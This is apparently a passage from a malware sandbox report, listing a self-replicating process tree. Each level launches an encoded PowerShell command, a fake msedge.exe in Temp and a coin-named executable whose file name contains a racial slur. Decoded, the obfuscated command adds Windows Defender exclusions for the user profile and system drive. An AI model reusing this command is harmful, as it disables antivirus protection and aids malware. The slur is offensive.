        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        189⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        189⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        189⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        190⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        190⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        190⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        191⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        191⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        191⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        192⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        192⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        192⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        193⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        193⤵
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        193⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        194⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        194⤵
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        194⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        195⤵
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        195⤵
        
        PID:996
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        195⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        196⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        196⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        196⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        197⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        197⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        197⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        198⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        198⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        198⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        199⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        199⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        199⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        200⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        200⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        200⤵
        
        PID:3424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        201⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        201⤵
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        201⤵
        
        PID:3728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        202⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        202⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        202⤵
        
        PID:3832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        203⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        203⤵
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        203⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        204⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        204⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        204⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        205⤵
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        205⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        205⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        206⤵
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        206⤵
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        206⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        207⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        207⤵
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        207⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        208⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        208⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        208⤵
        
        PID:1740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        209⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        209⤵
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        209⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        210⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        210⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        210⤵
        
        PID:1340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        211⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        211⤵
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        211⤵
        
        PID:532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        212⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        212⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        212⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        213⤵
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        213⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        213⤵
        
        PID:3772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        214⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        214⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        214⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        215⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        215⤵
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        215⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        216⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        216⤵
        
        PID:3980
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        216⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
